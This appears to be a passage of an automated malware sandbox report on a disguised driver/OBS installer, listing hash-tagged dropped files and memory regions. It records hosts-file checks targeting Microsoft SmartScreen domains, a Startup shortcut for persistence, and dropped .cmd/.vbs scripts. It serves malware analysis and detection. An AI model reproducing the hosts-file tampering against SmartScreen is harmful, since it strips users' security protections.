C:\Windows\system32\find.exefind /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\TMP\.CMDFilesize
28KB
MD543dbc0bf9164c0a548b45ddbb57ee50d
SHA1dc4287a77c8eae83c141c99efefb70acf698a8a4
SHA256b9d208b8aa071b76b1760bb69eee3151c75cd2779bcc94c9e77b67487dd5370c
SHA5129ef08c4795098d582eeeb92ec6b1f353a1d43d145ea222ee94eb3f695341f48b0481db000835fcd4b3209d90989109ffb755cd83e0d40c804052c27be6a6893a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
C:\Users\Admin\AppData\Local\Temp\3rpqamqf0xymy1h240657625.tmpFilesize
20KB
MD5055c8c5c47424f3c2e7a6fc2ee904032
SHA15952781d22cff35d94861fac25d89a39af6d0a87
SHA256531b3121bd59938df4933972344d936a67e75d8b1741807a8a51c898d185dd2a
SHA512c2772893695f49cb185add62c35284779b20d45adc01184f1912613fa8b2d70c8e785f0d7cfa3bfaf1d2d58e7cdc74f4304fd973a956601927719d6d370dd57a
-
C:\Users\Admin\AppData\Local\Temp\ab0cu2189gt240657906.tmpFilesize
6KB
MD5a5538caf2565d8c1e8ae8dce2b50e6cd
SHA17e7d30bc443a36ecc9033bdf5329ce9ee86783d9
SHA25695385104dfabee539b43c98ad10ab6c2c229f14e672dd91a3f645555086cfaf8
SHA5126afa57de6d03cdd924f32c0361787ad818bc1805875d656b8d396eeb7e402ff23e7562d38b2fc2f5889cb200ac17cf5f3f98c34e0503ef0b2f97fa20cb05682d
-
C:\Users\Admin\AppData\Local\Temp\ch4l67dvuf1l0tdi240657531.tmpFilesize
40KB
MD5b608d407fc15adea97c26936bc6f03f6
SHA1953e7420801c76393902c0d6bb56148947e41571
SHA256b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf
SHA512cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4
-
C:\Users\Admin\AppData\Local\Temp\de.cmdFilesize
156B
MD59972539e20656e7d427e7032a91e612b
SHA12316a78991e127b9ddfba4b88376c24e220ac57e
SHA256f64b2258031bbe5234e32a22ddf38ecefc6558c683cd60a2fa5bb20cd8e960e3
SHA512121f36b14ad6dfb065bc5626233ce1edcdbef732e729c0a1db03147c78937cbf771434a762077e6ac2274a6ad87bb2490c153042e39d75c62a97019540ee23dd
-
C:\Users\Admin\AppData\Local\Temp\fb6n81tyukot2240657531.tmpFilesize
88KB
MD58ee018331e95a610680a789192a9d362
SHA1e1fba0ac3f3d8689acf6c2ee26afdfd0c8e02df9
SHA25694354ea6703c5ef5fa052aeb1d29715587d80300858ebc063a61c02b7e6e9575
SHA5124b89b5adc77641e497eda7db62a48fee7b4b8dda83bff637cac850645d31deb93aafee5afeb41390e07fd16505a63f418b6cb153a1d35777c483e2d6d3f783b4
-
C:\Users\Admin\AppData\Local\Temp\inst.cmdFilesize
78B
MD5f361a90527b627fbd85f4a9084bbcabb
SHA11d39056c063d21f0809e787bf7b73ae2c49b2bb3
SHA256779b9c12c4b6c4b11bbca2fd23a3d027b9f12aac655ef0b77bca39da4c8ed173
SHA51249ccc44806472654eb7f0776d080e22f113162b1bd5827a5af701ebbd2b72608b40af7536a52199450aa21d68638535424c3d4e8028413a366df4f714b34bc24
-
C:\Users\Admin\AppData\Local\Temp\is-4FOIQ.tmp\obs64.tmpFilesize
1.1MB
MD534acc2bdb45a9c436181426828c4cb49
SHA15adaa1ac822e6128b8d4b59a54d19901880452ae
SHA2569c81817acd4982632d8c7f1df3898fca1477577738184265d735f49fc5480f07
SHA512134ff4022571efd46f7a62e99b857ebe834e9916c786345908010f9e1fb90be226b740ddee16ae9290fe45c86be7238c4555e422abe66a461d11545e19734beb
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\.cmdFilesize
1KB
MD5b46482b2d0cd42231e7430b7a7d48632
SHA12709f84185361c0c6d4840113dbf8a517a008380
SHA2562418eeb7a1f96943d73758c01a7dd437f7a543681ca83b4493ffeb27b10d0d46
SHA51299a7fb6e0934bc15b587ce4360ee4ac6297ca4e73878d557b28c6d98d04817ed5f9d2bdc35e4d3e828d442fe935973ccd1e719e7602055e4e360b9522af90eb5
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-MF3GV.tmp\AMD-drivers-2.0.7.tmpFilesize
1.4MB
MD5f91cacafae0f74891c7ed426567d83d3
SHA1edc7b0b92fc96f7d984ae912dec615c3339ac5de
SHA2563cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7
SHA512a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91
-
C:\Users\Admin\AppData\Local\Temp\is-VDUVT.tmp\AMD-drivers-2.0.7.tmpFilesize
1.4MB
MD5f91cacafae0f74891c7ed426567d83d3
SHA1edc7b0b92fc96f7d984ae912dec615c3339ac5de
SHA2563cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7
SHA512a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91
-
C:\Users\Admin\AppData\Local\Temp\is-VG8Q1.tmp\obs64.tmpFilesize
1.1MB
MD534acc2bdb45a9c436181426828c4cb49
SHA15adaa1ac822e6128b8d4b59a54d19901880452ae
SHA2569c81817acd4982632d8c7f1df3898fca1477577738184265d735f49fc5480f07
SHA512134ff4022571efd46f7a62e99b857ebe834e9916c786345908010f9e1fb90be226b740ddee16ae9290fe45c86be7238c4555e422abe66a461d11545e19734beb
-
C:\Users\Admin\AppData\Local\Temp\mz1sg9bmhkr240671875.tmpFilesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
C:\Users\Admin\AppData\Local\Temp\xn8w0oix240671875.tmpFilesize
112KB
MD5780853cddeaee8de70f28a4b255a600b
SHA1ad7a5da33f7ad12946153c497e990720b09005ed
SHA2561055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3
SHA512e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8
-
C:\Users\Admin\AppData\Local\Temp\yi3zl7f8gjuvn240657625.tmpFilesize
2KB
MD5cdaa4c77cf37240a2822b239378841af
SHA1f4d4daf9c90849075a58c6f13a9ad342edf0539a
SHA256c480c95d9111d82555e0f0d7ed47b97f364735e4102f56dfbb629ed2f89ba8a1
SHA512912d5b1636138ce9af6934bfafc672e4b8c5a8ea4ee6769c70dba1ab128651b4753284582a70003bdf5e31f1bd9f28a2210a1300051d8ab61996fb3160112a92
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
6KB
MD51661e8fa75f88d21874623c9256a59d9
SHA18a383ccb482cc2841476d14fbb352761f3e084dd
SHA256cc7d94580ec5babd9cdac7facd0dc700091855f6fbd99661551a94b27ebe9210
SHA512fd4b71353f32e55926fddbf22e1e4b8c4bb619295410ce34beabcb63f5714e652790cd798f790ba4f22a4d07fa6ae1909a60e4141522f1adaf6b84ddafcd24e3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS.lnkFilesize
391B
MD5612b32a6b6df414cef6696d7fda53fb1
SHA1c512aa6169d377efafb52b94fc14925a91cf904b
SHA2566b6dc161b0839b626576da0a2e24e3e77670fedd23fc9ddb582f80dc60cb014a
SHA512b179f50c7f0326f1be4a65c248e6018e0953bf579b878fcb1c1f8661cf83897cb0a828a23adc689cbe36374125abc357a04959380ee8ebb0b745602fc78f064f
-
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xmlFilesize
3KB
MD5bf8d4925b769054a2c10ac106931a2fc
SHA15d5ea16c0f1a23d09a6a2abff0eebb4e98ebe92f
SHA2565d4fc0de1f26e7961659f9866bfdd4c3043b9ecb099a691dc045d7e627a1febc
SHA512fc21c3ce087ea5e609150e9c4645811873274312d20fc136a1909a58d70b790b1106ce964cf38a16cbb0fd67b32e603a1689568deed1c046b412c8ab2a305310
-
C:\Windows\system32\drivers\etc\hostsFilesize
861B
MD5ccaab279e1a808f65f24f8cf9f76ce9d
SHA14f03dffdb7468fcd96d701c2a1a1f62f056e3cc9
SHA2564e6391c2a6b4eb748e3b83906b2cfe743f9645db6f2d44732a12247e62c2963e
SHA5121af8d3ed35eb928bce408aa8ba2aad8eb4dc92717d7deb00ece007ced8381ebed82a27e6ec17bf9e747cce9f51f38e686e9edfd20c5920691f1f1bd15e89e5ca
-
C:\Windows\system32\drivers\etc\hostsFilesize
902B
MD57b214d6d95ff114c808d1e64c43c7f2d
SHA1ec8626bc0b1e557e6137691f4eaeb8fa9a99009d
SHA256eebfe6d36feca8765826753f10403a16620618ffb779eca61d017192e64e26e2
SHA5120d46da98af73cf44be51b0f4d41ad4d3463db0ea9d815bac660748ba116f12ac2b1937fbb0143f97b46b82c6577dd185e7aa5722e3b1acd08d15b04b5bf217fd
-
C:\Windows\system32\drivers\etc\hostsFilesize
942B
MD555334a37089780f18eeaa70f3b274baf
SHA1c14598167d692accf83ccd22004b176f59c557b6
SHA256fea20c810ea7f8ddc49f2326d3b7479b2ca87bb9673428d21f08ce22ad37b58c
SHA5129451de09b5b5b6f4a90bbdb499a68866e0633076df110cf103932dda00b9f29e771ebe06acb61c1ff283e7b4c7192d37ecc598adae7d98fd651a225eb9894289
-
C:\Windows\system32\drivers\etc\hostsFilesize
981B
MD52920a7646681f086f0c966310c80d1d5
SHA19df9b6a4a7392eaa629cdf508352dbd61de218b3
SHA2565875b7277289a610ccb534655f8883b80df2671cc09f8143fd558120e1038c55
SHA512d7777a81ed48a5343c0177bb37e5f4ce9818dd063ef7f57514b7894d74f7e839660113937ada69b4e42700404a116161fbf7027710e1b6c1de1b78a4a3c7aa3c
-
C:\Windows\system32\drivers\etc\hostsFilesize
1019B
MD5ea0aba7b4b47f684b5a758f6569c3d77
SHA11e3230fb86e0c2bbda5fed9b0d6c7150517ec775
SHA2565d1ae84aba859fce0ba763cd2481d898c550a76bcc091258636f50a117388fd3
SHA512c2a1096ad7a34619e9dbea4a0959e2eefef1e96a752a580eb41fe8e79f978699018257be145de749fb546092b8347b1c133acbe5d6c7b1ca57f331c71e5d74c4
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD505997c72e4639716e7ddb5fd4278d861
SHA17b96b82400f547504f6ee32274868e9787d11420
SHA256c0bff3a300c6a9f3e692d640f6318f05b45ae72b8f164b9a40344a91c6bce36a
SHA51216697c60fd67964c66ead5823617516eba14400b09df3da9c7ee77c549d7e2c74b560d7a4607a537012733552cf52898bbcae1e334e7e65062958cca245a39b5
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD55ae4d1fcb2d9d07d5fe778fae7ef6ff0
SHA1883d394492e1899951866fbb43da5392708e53a3
SHA256113205caf212653ef0b70a7382d5f77bd68243d0f81be755d045d54e268f825e
SHA512a0f1984d0eed0db2d82f992bd50817f9af3534e2a0a8aa72aff5bd8eb4addcc850bc6bf9cd20bc9a140bff05dbf3b79647a9fb76275b96e6f966300e6950d8b5
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5cd95ea96dabf6c7b2aa729c5f033ec53
SHA11cff2eeb87582dd88872960f84250e48143d472b
SHA256043fc19c6cd1f211d21fae9461d8c0a47bab025f8266e5384b8fd9565fc953ac
SHA512dd3d0a2e31eef7cd3c3ec00fe0aeaf248e51ed66543665959ecbf3ad7faeb55f77a408022fd748a5d7edff33f567c31cfbc867c8b292d003d10a43bec5c3b908
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5f9fb3575e73b4f707942d3efa582147a
SHA140f28d3cdc95ee46349cba64e9f0e9fd8fd8ba37
SHA256cfd6e5acb71babb125d3f8f048f5d378c404c8a8ef1b120debbb0b1aaead6d5d
SHA51256b8c6e7273cd752bc8b5841d45606cc2fbf919ac72312b1df7dbd57e6764e8bf979025ec8e1ca4ae5dda37f5090e4e6e26acacf1da90fea4b37a1c6a3a098bd
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5163d82b281219a265e6f035021c76670
SHA13defa289b4e14550ee9e2083d79fbb271fe4b97f
SHA25662591c30bea18f749063b8f1a8ee325c3bc44550d0811313c17fce71b8754e9e
SHA512fb6f01fa686a5fe70a8ad35b2bf0e7ffac93a06ef2176cdb186003f4576958c435a753d9609f001af7de9ce4d31096ffb54ff3f68ea700f0d1714142e965790e
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD50298c46468b2ec577565a92bcd2114a0
SHA1c996b85993a2412213de6ea3bf9ee12ac89a6fba
SHA25608525c2616d669c081322d463e65892d66083384ffd781e229af4c0de9450a40
SHA512942f164527165840286c5b12fe3b314dfaade9c546abf260cedaff0cfa90a5784739991fdd7fae8d6c56138d45e2e2450161312dc4dd90ff3f3856e251f17f90
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD59f8eec90e96b330b1ff59776077fc3e2
SHA1842f418d71df86676b69a4ebdbb2c94473dea5db
SHA256c50dd21ba1400408267a24c9ce11d55da7817cbd1bc37c2059e65e91a097ac46
SHA512273d5863df64cf2edd299c7832edf50ec39c8860068405349301f8df36e922c6690cca7fd1bfe40b7a920d01db56b5fb980a17e4e34c21802b254d3fc0353c0c
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD55858bb84aed5be16c369a0a14d0f3bcc
SHA175183ccbd219e798f8b091931adad94524a2fb84
SHA2566ada142f57568e0922c2ac4439370497f587afd1646ab27d5d789d73cf1b107e
SHA51264f473084623479ea7b7329cb37a26d30a64be0b6395e469b10ff187d489882b21570ac1f9200f17535ef2ba632549cd9bf6b8f1c848373c549a1b58fabf1615
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5872e498bf571eda19f2394020ace3eaa
SHA1a7a0e41ccdebd26c6a59b19464b2f31a005ebb8d
SHA2569e904c48e66473f9f86765ad04d8f8d1a07340083e41fe4ce1d011df6ef06850
SHA51233335e256c33718bc1edb339956fe495dc8ef997906092c3b344902eaa13ed4c87062a58c7f3f5f89a70edcbbb563581124dc5441c1c19f0208bec9b3150b715
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5f0b9e5d0f4303314ad1cdc1d6aadac2d
SHA1cbdadc878feb9f302cc70e72e9d31f6791ca33fe
SHA256fdd521b3aa3d680d26c65ed67ac5cc1943e5861b61741653671243460119c4f3
SHA512840419f6112e37baf1b337507e2f646cdf6c20f5242292f8a541652c3b414354f36e3e67eae4be084e5eec626a28757736a439dcc3ea3ae707454a7737df0518
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5960502a0ae88ef892ead60dc6b2fb6a9
SHA1df7869a276b705db6675ba1976b4f392eb2f2e49
SHA256af6f265dbb05a8cb23d580442732df055eb9cd7156567040a90b01710485e4f6
SHA512470260588909a5da5590b5a278fc6d545a0535f72da81271d27106af13ceaef7713eea8eb0c9ad0d2cd542938acc6cf532977ff216c12424aa5d048de361264f
-
C:\tmp\.vbsFilesize
211B
MD5dea060bb5064255907ca7ae046275a7d
SHA131338df88179fbaa01879a4721aaeb773d37bc5b
SHA25665a573682c0e582d623c81e7f3bcacfb23b7a74cea835e815af0081a7380ca9d
SHA512b4228463e6f3dc47d4e57754421944da4ffe273e2d783ecbfac1650e31c5ecfa3c143780d8bce24716ffba852f97e94e13198ea40d550da6f7daac0d72328ada
-
C:\tmp\obs32.dllFilesize
3.6MB
MD5beb538b0efb64d3c5634ba703fbc7505
SHA1089e448a0f0c8b1c80592364e84cc3ce5519ebcc
SHA256945be3370712e192b2827a132935ec99a9ca52b87a6bd642f9afdc96f87d07fb
SHA51208f402bb7e4735072588741779f181a015a47454100f0c97c032b75793f2a6c35673ab5bfa5bb2da61a37d4c843991e3a4a78102fb0866e58addc64fc9406e90
-
C:\tmp\obs64.exeFilesize
9.3MB
MD5e819bc0aa0a2b76f4d5aa3e0a5a7dcf4
SHA1160b58c2d333cb20517898f0a91e505e49560860
SHA256d5558276830a38aab027a6201e169ec7463253ad144befe9a27f8f996c78e433
SHA51279c0c3766f7cc531b156dc9ad51955d4f412e8694b4e3d8db1f49d911204656451b6977b736b23db85cbfe00ecc15c5ab1ad5ca26a3988b5e52969ff6d271045
-
C:\tmp\obs64.scrFilesize
9.0MB
MD58a43b78256248131b7ef4ec9ce5dc5c2
SHA150ee27c73291e0a5027d29fde20571ab66d9e5fa
SHA256e93832ec29ff60c65860876dc6f06ddc6374be8179385c48316d4469c3225e4f
SHA512761dcbadb99091f89ff9ef21993bfa462d3bc7da84f940e5ba8043fce8122e2be02ba729f42ed74ba09db57b24876d891bb2b7594c81ea4bbd373b6848026467
-
memory/380-164-0x0000000000000000-mapping.dmp
-
memory/444-194-0x0000000000000000-mapping.dmp
-
memory/604-159-0x0000000000000000-mapping.dmp
-
memory/664-162-0x0000000000000000-mapping.dmp
-
memory/796-232-0x0000000000000000-mapping.dmp
-
memory/864-288-0x00007FFECEA10000-0x00007FFECF4D1000-memory.dmpFilesize
10.8MB
-
memory/864-287-0x00007FFECEA10000-0x00007FFECF4D1000-memory.dmpFilesize
10.8MB
-
memory/864-286-0x0000017A612C0000-0x0000017A612E2000-memory.dmpFilesize
136KB
-
memory/928-226-0x0000000000000000-mapping.dmp
-
memory/984-207-0x0000000000000000-mapping.dmp
-
memory/996-191-0x0000000000000000-mapping.dmp
-
memory/1060-187-0x0000000000000000-mapping.dmp
-
memory/1252-186-0x0000000000000000-mapping.dmp
-
memory/1416-171-0x0000000000000000-mapping.dmp
-
memory/1460-168-0x0000000000000000-mapping.dmp
-
memory/1476-185-0x0000000000000000-mapping.dmp
-
memory/1584-174-0x0000000000000000-mapping.dmp
-
memory/1632-196-0x0000000000000000-mapping.dmp
-
memory/1660-203-0x0000000000000000-mapping.dmp
-
memory/1700-176-0x0000000000000000-mapping.dmp
-
memory/1824-160-0x0000000000000000-mapping.dmp
-
memory/1844-175-0x0000000000000000-mapping.dmp
-
memory/1956-189-0x0000000000000000-mapping.dmp
-
memory/2000-132-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/2000-137-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/2000-142-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/2084-151-0x0000000000000000-mapping.dmp
-
memory/2084-155-0x00007FFECF310000-0x00007FFECF823000-memory.dmpFilesize
5.1MB
-
memory/2112-298-0x00007FFECEA10000-0x00007FFECF4D1000-memory.dmpFilesize
10.8MB
-
memory/2120-285-0x0000000003580000-0x0000000003627000-memory.dmpFilesize
668KB
-
memory/2120-279-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-283-0x0000000003580000-0x0000000003627000-memory.dmpFilesize
668KB
-
memory/2120-282-0x0000000011000000-0x0000000011158000-memory.dmpFilesize
1.3MB
-
memory/2120-281-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-280-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-275-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-284-0x0000000011000000-0x0000000011158000-memory.dmpFilesize
1.3MB
-
memory/2120-277-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-290-0x0000000003580000-0x0000000003627000-memory.dmpFilesize
668KB
-
memory/2124-163-0x0000000000000000-mapping.dmp
-
memory/2208-221-0x0000000000000000-mapping.dmp
-
memory/2232-198-0x0000000000000000-mapping.dmp
-
memory/2380-215-0x0000000000000000-mapping.dmp
-
memory/2392-188-0x0000000000000000-mapping.dmp
-
memory/2432-214-0x0000000000000000-mapping.dmp
-
memory/2436-225-0x0000000000000000-mapping.dmp
-
memory/2536-173-0x0000000000000000-mapping.dmp
-
memory/2696-219-0x0000000000000000-mapping.dmp
-
memory/2832-172-0x0000000000000000-mapping.dmp
-
memory/2968-182-0x0000000000000000-mapping.dmp
-
memory/3000-143-0x0000000000000000-mapping.dmp
-
memory/3056-212-0x0000000000000000-mapping.dmp
-
memory/3204-230-0x0000000000000000-mapping.dmp
-
memory/3236-241-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/3236-251-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/3236-247-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/3472-178-0x0000000000000000-mapping.dmp
-
memory/3496-184-0x0000000000000000-mapping.dmp
-
memory/3568-228-0x0000000000000000-mapping.dmp
-
memory/3572-158-0x0000000000000000-mapping.dmp
-
memory/3692-181-0x0000000000000000-mapping.dmp
-
memory/3724-201-0x0000000000000000-mapping.dmp
-
memory/3764-177-0x0000000000000000-mapping.dmp
-
memory/3836-205-0x0000000000000000-mapping.dmp
-
memory/3936-190-0x0000000000000000-mapping.dmp
-
memory/4024-167-0x0000000000000000-mapping.dmp
-
memory/4076-170-0x0000000000000000-mapping.dmp
-
memory/4116-180-0x0000000000000000-mapping.dmp
-
memory/4120-202-0x0000000000000000-mapping.dmp
-
memory/4152-217-0x0000000000000000-mapping.dmp
-
memory/4228-264-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/4228-253-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/4228-249-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/4232-179-0x0000000000000000-mapping.dmp
-
memory/4268-273-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-278-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-274-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-272-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-268-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4296-183-0x0000000000000000-mapping.dmp
-
memory/4420-169-0x0000000000000000-mapping.dmp
-
memory/4492-223-0x0000000000000000-mapping.dmp
-
memory/4532-165-0x0000000000000000-mapping.dmp
-
memory/4548-134-0x0000000000000000-mapping.dmp
-
memory/4576-166-0x0000000000000000-mapping.dmp
-
memory/4580-209-0x0000000000000000-mapping.dmp
-
memory/4740-148-0x0000000000000000-mapping.dmp
-
memory/4740-153-0x0000000002C80000-0x0000000003193000-memory.dmpFilesize
5.1MB
-
memory/4844-210-0x0000000000000000-mapping.dmp
-
memory/4912-138-0x0000000000000000-mapping.dmp
-
memory/4964-144-0x0000000000000000-mapping.dmp
-
memory/5004-161-0x0000000000000000-mapping.dmp
-
memory/5068-147-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5068-140-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5068-139-0x0000000000000000-mapping.dmp
-
memory/5068-255-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5104-193-0x0000000000000000-mapping.dmp